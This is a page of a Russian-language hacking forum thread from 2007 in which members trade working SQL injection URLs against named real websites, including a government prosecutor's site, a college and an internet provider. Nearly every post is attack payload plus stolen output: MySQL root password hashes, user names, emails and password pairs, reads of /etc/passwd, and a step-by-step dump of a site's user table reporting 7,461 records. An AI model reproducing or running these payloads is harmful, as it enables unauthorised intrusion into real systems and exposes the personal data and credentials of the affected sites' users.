ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3161  
Старый 24.09.2007, 12:26
inlanger
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме:
3326855

Репутация: 702


По умолчанию

Цитата:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,5,6,7,8,1,1,1/*
выводим юзера и пасс:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,user,password,6,7,8,1,1,1+from+mysql.user/*

yroot
31a457464200908a


Это первая удачная скуля, которой я сумел воспользоваться, и понял, как они работают! Спасибо всем за это!
 
Ответить с цитированием

  #3162  
Старый 24.09.2007, 19:27
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Код:
http://www.missiontech.co.nz/read_a_article.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database())/*
toms@localhost:5.0.41:MT_ArticlesDB
Код:
http://www.gicom.co.mz/index.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9/*
gicomco@localhost:4.1.22-standard:gicomco_site
Код:
http://farm.avocadolite.com/member.phtml?id=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),7,8/*
4.1.16-standard-log
Код:
http://www.ollin.com.mx/news_esp.php?id=-1+union+select+1,2,3,4,concat(nombre,0x3a,password,0x3a,email),6,7,8+from+usuarios/*
Joe:4050:joel@ollin.com.mx
Код:
http://www.a.com.mx/noticia.php?id=-1+union+select+1,user(),3,4,database(),6,7,8,version()/*
Код:
http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*  midiasemmascara@200.234.200.116:5.0.41--log:midiasemmascara  http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+1,concat(login,0x3a,usuario)+from+db_admusers+limit+2,1/*
Код:
http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*  papst2007@localhost:4.0.24_Debian-10sarge2-log:visitapapa  http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,user,password+from+mysql.user/*
root:706ae7350f1aa0d5
Код:
  http://www.temporeal.com.br/produtos.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*  temporeal@10.10.10.2:4.0.21-standard-log:temporeal
Код:
http://www.araucodobrasil.com.br/page.php?id=-1+union+select+1,concat(name,0x3a,login,0x3a,password,0x3a,type)+from+aglomerado_users+limit+19000/*
Код:
http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7/*&tipo=episodio&origem=Assista  http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(USER,0x71),0x71),6,7+from+mysql.user/*&tipo=episodio&origem=Assista  http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),6,7/*&tipo=episodio&origem=Assista
Код:
http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13/*  http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(column_name,0x3a,table_name),10,11,12,13+from+INFORMATION_SCHEMA.COLUMNS+limit+178,1/*
Код:
http://www.rockwm.de/songdetail.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),8,9,10,11,12/*
Код:
http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6/*
intranet@200.142.13.133:5.0.22-Debian_0ubuntu6.06.2-log:intranet
Код:
http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/ union/**/select/**/1,user,password,4 ,5,6+from+mysql.user+limit+1,2/*
root:4cd8bb5521e9721c
лимитом до 6,2
Код:
http://www.prrn.mpf.gov.br/noticia.php?id=-1/** / union/**/select/**/1,2,concat(column_name,0x3a,table_name,0x3a),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+159,1/*

Последний раз редактировалось Nea7; 24.09.2007 в 20:05..
 
Ответить с цитированием

  #3163  
Старый 24.09.2007, 19:42
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.themetalcircus.com/noticiadia.php?id=-1+union+select+1,login_name,3,4,5,6,7,8,9,10,11,12 ,13,14+loginform/*
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+user(),2+from+login/*
PR=8/10
http://www.gametrailers.com/gamepage.php?id=-1+union+select+1,2,3,user(),5,6,7,8,9,10,11,databa se(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29/*
PR=5/10


http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+articles/*

http://michaelyoun.com/index.php?id=336+union+select+1,concat(login,char( 58),pass),3,4,5,6+from+users/*
ЧТО ЭТО? (последняя)

Последний раз редактировалось Termin@L; 25.09.2007 в 01:13..
 
Ответить с цитированием

  #3164  
Старый 25.09.2007, 14:02
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию

Интернет провайдер
Код:
http://trytek.ru/tarifs.php?go=chasn&act=view&id='
Код:
http://trytek.ru/tarifs.php?go=chasn&act=view&id='%20union%20select%201,2,3,4,5,6,7,8,9,10/*
Код:
http://trytek.ru/tarifs.php?go=chasn&act=view&id='%20union%20select%201,concat(column_name,0x3a,table_name,0x3a),3,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.COLUMNS%20limit%201,1/*
Дальше сами )
 
Ответить с цитированием

  #3165  
Старый 25.09.2007, 16:42
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.smother.net/reviews/hiphop.php?ID=-12+UNION+select+1,2,username,4,password,6,email,ho mepage,9,10,11,12+from+users+limit+301,1
"/
 
Ответить с цитированием

  #3166  
Старый 25.09.2007, 18:29
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию

Код:
http://www.crystalmoby.com/shop.php?id=-15+union+select+1,2,3,4,5,6,7/*
Код:
http://www.do4money.com/directory.php?ax=list&sub=7&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13/**/FROM/**/admin/*
 
Ответить с цитированием

  #3167  
Старый 25.09.2007, 18:42
mister
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840

Репутация: 35
Отправить сообщение для mister с помощью ICQ
По умолчанию

Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables/*
 
Ответить с цитированием

  #3168  
Старый 25.09.2007, 21:51
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

Цитата:
Сообщение от mister  
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables/*
раскрутил:

Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+66,1/*
такбличка юзерс.

колумны:

username:
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+9,1/*
pword:
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+10,1/*
вывод:... только почемуто пусто... мб ни 1 юзера?
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,pword,username,4,5,6,7,8,9,10,11,12,13,14+from+users/*
 
Ответить с цитированием

  #3169  
Старый 25.09.2007, 22:13
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от BlackCats  
вывод:... только почемуто пусто... мб ни 1 юзера?
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,pword,username,4,5,6,7,8,9,10,11,12,13,14+from+users/*
Пусто у тебя в голове))

Код:
http://www.tea.co.uk/index.php?pgId=11111111111111111+union+select+1,concat(username,char(58),pword),5,4,5,6,7,8,9,10,11,12,13,14+from+users+where+length(username)>=1+limit+0,1/*
Получаем:

faridah94@hotmail.com:faridah94@hotmail.com

и т.д. записей много:

Код:
http://www.tea.co.uk/index.php?pgId=11111111111111111+union+select+1,count(concat(username,char(58),pword)),5,4,5,6,7,8,9,10,11,12,13,14+from+users+where+length(username)>=1+limit+0,1/*
Записей: 7461
 
Ответить с цитированием

  #3170  
Старый 25.09.2007, 22:15
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

Объяснял новечку скули и случайно наткнулся на .edu :

Код:
http://www.antioch-college.edu/news/releases/index.php?id=-178%20UNION%20SELECT%201,2,user(),version(),database(),6,7,8,9,10,11,12/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ